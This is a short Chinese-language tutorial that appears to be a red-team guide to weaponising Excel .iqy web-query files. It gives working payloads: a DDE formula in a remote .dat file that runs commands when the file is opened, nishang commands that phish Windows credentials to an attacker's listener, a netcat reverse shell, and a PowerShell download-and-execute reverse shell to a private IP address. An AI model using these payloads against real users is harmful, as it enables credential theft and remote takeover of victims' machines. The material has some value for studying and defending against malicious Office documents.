IQY
iqy文件是一种用于从Web或SharePoint上的数据源导入数据到Excel的文件,它也叫做Internet查询文件或Web查询文件。
iqy文件的作用是创建一个一方向的数据连接,使其可以在Excel中刷新和分析数据,而不用每次都重新下载或复制粘贴。
编辑test.iqy文件如下:
WEB
1
https://www.baidu.com/robots.txt保存后并运行会提示潜在的安全问题,选择启用后,EXCEL将会自动拉取https://www.baidu.com/robots.txt的结果并保存到EXCEL文件中:
当然,你也可以在远程dat文件中放置执行的代码:
=cmd|' /C calc'!notthissheet然后编辑以下iqy代码:
WEB
1
http://192.168.8.145/calc.dat当打开iqy文件时,将会弹出计算器:
凭据钓鱼
该方法会生成一个带有窃取凭据窗口的iqy文件,当受害者输入凭据后,就会发送到攻击者主机的监听器上。
首先,导入nishang并以管理员权限运行脚本:
Out-WebQuery -URL http://192.168.8.135/这将会在nishang的主目录中生成一个QueryData.iqy文件:
然后我们需要开启一个监听器,用以监听NTLM凭据:
Start-CaptureServer -AuthType Basic -IPAddress 192.168.8.135 -LogFilePath log.txt
然后将QueryData.iqy文件发送到受害者主机,当启用后,会看到要求提供凭据:
当受害者输入凭据后,就可以通过监听终端查看用户名和密码:
交互式会话
以NC为例,编辑远程dat文件如下:
=cmd|' /C C:\Users\Administrator\Desktop\nc.exe 192.168.8.145 4444 -e cmd.exe'!notthissheet然后编辑iqy文件:
WEB
1
http://192.168.8.145/test/iqy.dat当受害者运行时,即可监听到会话:
该条命令是运行受害者主机的NC以获取到会话,当然也可以通过PowerShell脚本来获取,编辑dat文件如下即可:
=cmd|' /C powershell.exe "IEX(New-Object Net.WebClient).DownloadString('http://192.168.8.145/nishang/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.8.145 -Port 4444"'!notthissheet